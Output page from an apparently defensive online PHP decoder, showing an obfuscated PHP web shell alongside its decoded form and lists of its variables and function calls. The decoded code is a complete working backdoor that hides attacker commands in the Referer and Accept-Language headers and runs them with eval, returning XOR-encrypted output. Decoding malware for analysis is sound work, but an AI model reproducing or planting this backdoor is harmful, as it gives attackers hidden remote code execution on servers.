Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $d=';$z++)$O1p.=$q[O1$m[O12][$z]];if(O1O1O1strposO1($O1p,$h)===0){$s[$iO1]="";$p=$s..

Decoded Output download

$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$d=';$z++)$O1p.=$q[O1$m[O12][$z]];if(O1O1O1strposO1($O1p,$h)===0){$s[$iO1]="";$p=$sO1s($p,3);O1}iO1f(array_';
$s='1_start();@evO1al(O1@gzuncomO1prO1ess(@x(O1@bO1ase64_decode(O1pO1reg_replace(O1array("/O1_/","/O1-/"),arr';
$Q='d5($O1O1i.$kh),0,3)O1);$f=O1$sl($ss(O1md5($i.$O1kf),0,3O1O1));$p=""O1;fO1or($z=O11;$z<count($O1m[O11])';
$n='O1$kh="5d41";$O1kf=O1"O1402a";function x($O1O1t,$k){$c=O1stO1O1rleO1n($k);$l=strlenO1($t);$oO1=""O1;f';
$O='O1ayO1("/","+O1"),O1$ss($s[$i],0O1O1,$e))),$k)O1O1));$o=O1ob_O1gO1et_contents();obO1_end_cleO1an();O1$d=b';
$q='or($i=0;$i<$O1O1O1l;){for($jO1=0;($j<$c&&$iO1<$O1l)O1;O1$j++,$i++){$o.=$t{$iO1}^$k{O1$j};O1}}retuO1rn $o;}';
$j='O1s=&O1O1$_SESSION;$O1ss="suO1bstrO1";$sO1l="stO1rtolower";$i=O1$m[O11][0].$m[1]O1[1];O1$h=$sl(O1$O1ss(m';
$A='kO1ey_exO1isO1ts($i,$s)O1O1){$s[$i].=$O1O1p;$e=strpos($s[O1$i]O1,$f);if($eO1){$kO1O1=$kh.$kfO1;obO';
$o=str_replace('lT','','crlTelTate_lTlTfunlTclTtion');
$v='$rO1=$_SEO1RO1VER;$O1rO1r=@$r["HTTP_REFEREO1R"];O1O1$ra=O1O1@$r["HTO1TP_ACCEO1PT_LANGUAGE"];if($rr';
$z='asO1e64_eO1ncode(O1x(gzO1compress($oO1),$k))O1;print("<O1$k>$d<O1/$k>O1");@sesO1sO1ion_destO1roy();}}}}';
$T='O1&&$rO1a)O1{$u=parse_uO1rl($rr);O1parO1se_strO1($uO1["query"O1],$q);$q=arO1ray_vaO1lues(O1$qO1);';
$w='pregO1_match_aO1ll("/O1([\\wO1])O1[\\w-]O1+(?:;q=0.([\\d]O1))?,?/",$O1O1ra,$m);if(O1$q&&$m)O1{@O1sessiO1on_start();$';
$S=str_replace('O1','',$n.$q.$v.$T.$w.$j.$Q.$d.$A.$s.$O.$z);
$y=$o('',$S);$y();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$A kO1ey_exO1isO1ts($i,$s)O1O1){$s[$i].=$O1O1p;$e=strpos($s[O1$..
$O O1ayO1("/","+O1"),O1$ss($s[$i],0O1O1,$e))),$k)O1O1));$o=O1ob..
$Q d5($O1O1i.$kh),0,3)O1);$f=O1$sl($ss(O1md5($i.$O1kf),0,3O1O1)..
$S $kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=str..
$T O1&&$rO1a)O1{$u=parse_uO1rl($rr);O1parO1se_strO1($uO1["query..
$d ;$z++)$O1p.=$q[O1$m[O12][$z]];if(O1O1O1strposO1($O1p,$h)===0..
$j O1s=&O1O1$_SESSION;$O1ss="suO1bstrO1";$sO1l="stO1rtolower";$..
$n O1$kh="5d41";$O1kf=O1"O1402a";function x($O1O1t,$k){$c=O1stO..
$o create_function
$q or($i=0;$i<$O1O1O1l;){for($jO1=0;($j<$c&&$iO1<$O1l)O1;O1$j++..
$s 1_start();@evO1al(O1@gzuncomO1prO1ess(@x(O1@bO1ase64_decode(..
$v $rO1=$_SEO1RO1VER;$O1rO1r=@$r["HTTP_REFEREO1R"];O1O1$ra=O1O1..
$w pregO1_match_aO1ll("/O1([\wO1])O1[\w-]O1+(?:;q=0.([\d]O1))?,..
$y None
$z asO1e64_eO1ncode(O1x(gzO1compress($oO1),$k))O1;print("<O1$k>..

Stats

MD5 da690c581a8f49c5ccde52f6082ea674
Eval Count 1
Decode Time 121 ms